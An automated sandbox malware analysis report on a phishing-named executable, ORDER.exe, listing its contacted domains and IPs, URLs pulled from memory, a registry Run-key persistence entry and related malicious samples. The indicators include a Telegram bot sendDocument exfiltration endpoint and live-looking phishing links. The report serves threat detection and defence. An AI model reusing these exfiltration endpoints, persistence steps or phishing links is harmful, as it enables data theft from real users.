                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://mail.vasudeva.in0%Avira URL Cloudsafe
                  http://5WnFQTEnuc.com0%Avira URL Cloudsafe
                  http://www.fontbureau.comoD0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://www.fontbureau.como0%URL Reputationsafe
                  http://vasudeva.in0%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  elb097307-934924932.us-east-1.elb.amazonaws.com
                  54.243.164.148
                  truefalse
                    high
                    vasudeva.in
                    68.233.236.158
                    truetrue
                      unknown
                      mail.vasudeva.in
                      unknown
                      unknowntrue
                        unknown
                        g.msn.com
                        unknown
                        unknownfalse
                          high
                          api.ipify.org
                          unknown
                          unknownfalse
                            high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmpfalse
                              high
                              http://127.0.0.1:HTTP/1.1ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.apache.org/licenses/LICENSE-2.0ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                    high
                                    http://DynDns.comDynDNSkprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/?ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://RKhkfz.comkprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers?ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.tiro.comkprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designerskprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                          high
                                          http://5WnFQTEnuc.com1-5-21-3853321935-2125563209-4053062332-1002_ClassesORDER.exe, 00000003.00000003.464804013.0000000001424000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.goodfont.co.krORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.coml1ORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.comlORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://api.ipify.orgGETMozilla/5.0kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cTheORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://api.ipify.orgORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmpfalse
                                              high
                                              http://fontfabrik.comORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.founder.com.cn/cnORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://mail.vasudeva.inORDER.exe, 00000003.00000002.508225211.0000000003363000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                high
                                                http://5WnFQTEnuc.comORDER.exe, 00000003.00000002.506730748.0000000003106000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://api.telegram.org/bot%telegramapi%/ORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comoDORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comoORDER.exe, 00000000.00000002.254347827.00000000017B7000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://vasudeva.inORDER.exe, 00000003.00000002.508225211.0000000003363000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/DPleaseORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8ORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fonts.comORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.sandoll.co.krORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.urwpp.deDPleaseORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cnORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER.exe, 00000000.00000002.254397053.0000000003061000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.333784884.00000000029B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.359485793.00000000029D1000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.sakkal.comORDER.exe, 00000000.00000002.260285382.0000000007132000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.340462721.0000000005B30000.00000002.00000001.sdmp, kprUEGC.exe, 00000012.00000002.366501999.00000000059B0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://secure.comodo.com/CPS0ORDER.exe, 00000003.00000002.514426874.0000000006AF0000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xORDER.exe, 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipORDER.exe, 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, ORDER.exe, 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, kprUEGC.exe, 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, kprUEGC.exe, 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, kprUEGC.exe, 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            54.243.164.148
                                                            unknownUnited States
                                                            14618AMAZON-AESUSfalse
                                                            68.233.236.158
                                                            unknownUnited States
                                                            29802HVC-ASUStrue

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                            Analysis ID:323803
                                                            Start date:27.11.2020
                                                            Start time:15:20:20
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 33s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:ORDER.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:29
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.adwa.spyw.evad.winEXE@18/10@5/2
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                                            • Quality average: 48.8%
                                                            • Quality standard deviation: 36.1%
                                                            HCA Information:
                                                            • Successful, ratio: 99%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 104.79.90.110, 51.11.168.160, 20.54.26.129, 2.20.142.209, 2.20.142.210, 51.103.5.186, 51.104.139.180, 52.142.114.176, 92.122.213.247, 92.122.213.194
                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, client.wns.windows.com, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, ris.api.iris.microsoft.com, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            15:21:18API Interceptor788x Sleep call for process: ORDER.exe modified
                                                            15:21:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                            15:21:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                            15:21:55API Interceptor522x Sleep call for process: kprUEGC.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            54.243.164.148Sulfasalazine-Granule.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            vQau1zZe6u.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            B2gnon0xfg.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            Shipping-Document.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            1119_673423.docGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            Rewgjqjhqwqn8.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            i3gRY0HYZn.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/?format=xml
                                                            mWKfVsuSZAHcuCc.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            Catalogue.exeGet hashmaliciousBrowse
                                                            • api.ipify.org/
                                                            68.233.236.158ORDER.exeGet hashmaliciousBrowse
                                                              TT COPY.exeGet hashmaliciousBrowse
                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                  TT COPY.exeGet hashmaliciousBrowse
                                                                    New order 20001789.exeGet hashmaliciousBrowse
                                                                      ORD002344536.exeGet hashmaliciousBrowse
                                                                        ORD002344536.exeGet hashmaliciousBrowse
                                                                          bank slip.exeGet hashmaliciousBrowse
                                                                            PO#ZT20-09.exeGet hashmaliciousBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              elb097307-934924932.us-east-1.elb.amazonaws.comswift copy.exeGet hashmaliciousBrowse
                                                                              • 23.21.42.25
                                                                              26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                                                              • 54.225.220.115
                                                                              Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                                                              • 174.129.214.20
                                                                              lxpo.exeGet hashmaliciousBrowse
                                                                              • 54.204.14.42
                                                                              guy1.exeGet hashmaliciousBrowse
                                                                              • 54.225.66.103
                                                                              guy2.exeGet hashmaliciousBrowse
                                                                              • 54.243.161.145
                                                                              PO_0012009.xlsxGet hashmaliciousBrowse
                                                                              • 23.21.252.4
                                                                              5C.exeGet hashmaliciousBrowse
                                                                              • 54.225.169.28
                                                                              INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                                                              • 54.225.66.103
                                                                              #A06578987.xlsmGet hashmaliciousBrowse
                                                                              • 54.204.14.42
                                                                              SecuriteInfo.com.Variant.Bulz.233365.3916.exeGet hashmaliciousBrowse
                                                                              • 23.21.252.4
                                                                              https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                                                              • 54.225.169.28
                                                                              INVOICE.xlsxGet hashmaliciousBrowse
                                                                              • 54.204.14.42
                                                                              PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                                                              • 174.129.214.20
                                                                              Inquiry_pdf.exeGet hashmaliciousBrowse
                                                                              • 23.21.42.25
                                                                              98650107.pdf.exeGet hashmaliciousBrowse
                                                                              • 23.21.42.25
                                                                              #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                                                              • 174.129.214.20
                                                                              1125_56873981.docGet hashmaliciousBrowse
                                                                              • 54.243.161.145
                                                                              yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                                                              • 54.235.142.93
                                                                              ER mexico.exeGet hashmaliciousBrowse
                                                                              • 54.235.83.248

                                                                              ASN

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              AMAZON-AESUSswift copy.exeGet hashmaliciousBrowse
                                                                              • 23.21.42.25
                                                                              26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                                                              • 54.225.220.115
                                                                              Direct Deposit.xlsxGet hashmaliciousBrowse
                                                                              • 34.231.129.212
                                                                              Direct Deposit.xlsxGet hashmaliciousBrowse
                                                                              • 52.205.236.122
                                                                              https://is.gd/NLY8SbGet hashmaliciousBrowse
                                                                              • 35.174.78.146
                                                                              Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                                                              • 174.129.214.20
                                                                              guy1.exeGet hashmaliciousBrowse
                                                                              • 54.225.66.103
                                                                              guy2.exeGet hashmaliciousBrowse
                                                                              • 54.243.161.145
                                                                              https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTczGet hashmaliciousBrowse
                                                                              • 3.215.226.95
                                                                              https://bit.do/fLpprGet hashmaliciousBrowse
                                                                              • 54.83.52.76
                                                                              PO_0012009.xlsxGet hashmaliciousBrowse
                                                                              • 23.21.252.4
                                                                              https://webnavigator.co/?adprovider=AppFocus1&source=d-cp11560482685&group=cg60&device=c&keyword=&creative=477646941053&adposition=none&placement=www.123homeschool4me.com&target=segment_be_a_7802457135858218830&sl=&caid=11560482685&gw=1&test=%3a%2f%2fmailGet hashmaliciousBrowse
                                                                              • 54.90.26.145
                                                                              https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                              • 52.202.11.207
                                                                              https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.comGet hashmaliciousBrowse
                                                                              • 34.236.142.3
                                                                              5C.exeGet hashmaliciousBrowse
                                                                              • 54.225.169.28
                                                                              INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                                                              • 54.225.66.103
                                                                              #A06578987.xlsmGet hashmaliciousBrowse
                                                                              • 54.204.14.42
